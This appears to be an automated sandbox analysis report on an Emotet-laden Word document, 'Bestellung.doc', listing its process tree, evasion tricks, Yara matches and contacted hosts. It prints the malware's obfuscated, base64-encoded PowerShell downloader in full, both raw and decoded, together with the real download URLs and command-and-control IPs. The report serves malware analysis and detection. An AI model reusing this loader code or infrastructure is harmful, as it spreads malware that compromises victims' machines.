Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADg
ANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023100B push ss; iretd 7_2_0023100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020F090 push edx; ret 7_2_0020F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F057F push ss; iretd 7_2_001F0580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00282D98 push 00282E25h; ret 7_2_00282E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290020 push 00290058h; ret 7_2_00290050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00284038 push 00284064h; ret 7_2_0028405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025A0B4 push 0025A0E0h; ret 7_2_0025A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025A0B2 push 0025A0E0h; ret 7_2_0025A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B274 push 0025B2CDh; ret 7_2_0025B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C34C push 0026C378h; ret 7_2_0026C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E450 push ecx; mov dword ptr [esp], edx 7_2_0025E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290498 push 002904EFh; ret 7_2_002904E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002904F4 push 0029055Ch; ret 7_2_00290554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002905B8 push 002905E4h; ret 7_2_002905DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0028B588 push 0028B5CAh; ret 7_2_0028B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290580 push 002905ACh; ret 7_2_002905A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002905F0 push 0029063Ch; ret 7_2_00290634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290654 push 00290680h; ret 7_2_00290678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029068C push 002906B8h; ret 7_2_002906B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E696 push ecx; mov dword ptr [esp], edx 7_2_0025E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E6F0 push ecx; mov dword ptr [esp], edx 7_2_0025E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002906C4 push 002906F0h; ret 7_2_002906E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D6DC push 0025D751h; ret 7_2_0025D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258748 push 00258774h; ret 7_2_0025876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D754 push 0025D7ADh; ret 7_2_0025D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E750 push ecx; mov dword ptr [esp], edx 7_2_0025E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002937A8 push 002937E0h; ret 7_2_002937D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258798 push 002587C4h; ret 7_2_002587BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002907E4 push 00290827h; ret 7_2_0029081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00290834 push 00290860h; ret 7_2_00290858
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029086C push 00290898h; ret 7_2_00290890

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv:Zone.Identifier read attributes | delete
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 7080
Source: unknown Network traffic detected: HTTP traffic on port 7080 -> 49175
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (55 identical entries collapsed)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (6 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (60 identical entries collapsed)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (6 identical entries collapsed)
Source: Bestellung.doc Stream path 'office' entropy: 7.95165191987 (max. 8.0)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233278 mov eax, dword ptr fs:[00000030h] 7_2_00233278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F27EC mov eax, dword ptr fs:[00000030h] 7_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403278 mov eax, dword ptr fs:[00000030h] 8_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D27EC mov eax, dword ptr fs:[00000030h] 8_2_001D27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002F27EC mov eax, dword ptr fs:[00000030h] 9_2_002F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403278 mov eax, dword ptr fs:[00000030h] 10_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003027EC mov eax, dword ptr fs:[00000030h] 10_2_003027EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 70.32.89.105 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 203.157.152.9 168
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 132.248.38.158 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 110.172.180.180 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 157.245.145.87 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 161.49.84.2 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"( Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command line omitted]
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command line omitted]

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 344273 Sample: Bestellung.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100
The graph itself is an image; the process tree, signatures and network contacts recoverable from it:

  • Bestellung.doc: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 13 other signatures
    • WINWORD.EXE (started)
    • cmd.exe (started): Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
      • msg.exe (started by cmd.exe)
      • powershell.exe (started by cmd.exe): contacts traumfrauen-ukraine.de (212.227.200.73, ports 443, 49170, 49171, ONEANDONE-ASBrauerstrasse48DE, Germany), e-wdesign.eu (45.138.97.75, ports 49169, 80, M247GB, Germany) and 3 other IPs or domains; drops C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll (data)
        • rundll32.exe (started by powershell.exe)
          • rundll32.exe (started)
            • rundll32.exe (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
              • rundll32.exe (started)
                • rundll32.exe (started): contacts 110.172.180.180 (ports 49179, 8080, WORLDPHONE-INASNumberforInterdomainRoutingIN, India), 132.248.38.158 (ports 49177, 49178, 80, UniversidadNacionalAutonomadeMexicoMX, Mexico) and 5 other IPs or domains; System process connects to network (likely due to code injection or exploit)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
104.21.88.166 unknown United States 13335 CLOUDFLARENETUS true
70.32.89.105 unknown United States 398110 GO-DADDY-COM-LLCUS true
203.157.152.9 unknown Thailand 9649 MOPH-TH-APInformationTechnologyOfficeSG true
45.138.97.75 unknown Germany 9009 M247GB true
132.248.38.158 unknown Mexico 278 UniversidadNacionalAutonomadeMexicoMX true
172.217.6.174 unknown United States 15169 GOOGLEUS true
110.172.180.180 unknown India 18002 WORLDPHONE-INASNumberforInterdomainRoutingIN true
157.245.145.87 unknown United States 14061 DIGITALOCEAN-ASNUS true
192.0.78.20 unknown United States 2635 AUTOMATTICUS true
212.227.200.73 unknown Germany 8560 ONEANDONE-ASBrauerstrasse48DE true
190.55.186.229 unknown Argentina 27747 TelecentroSAAR true
161.49.84.2 unknown Philippines 17639 CONVERGE-ASConvergeICTSolutionsIncPH true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
traumfrauen-ukraine.de 212.227.200.73 true
e-wdesign.eu 45.138.97.75 true
nightlifemumbai.club 172.217.6.174 true
jflmktg.wpcomstaging.com 192.0.78.20 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true Avira URL Cloud: malware unknown
http://traumfrauen-ukraine.de/bin/JyeS/ true Avira URL Cloud: safe unknown
http://203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ true Avira URL Cloud: safe unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/ true Avira URL Cloud: safe unknown
https://157.245.145.87:443/gjk3j942rq/3t3141347sxz/js59r1n8zph/ true Avira URL Cloud: safe unknown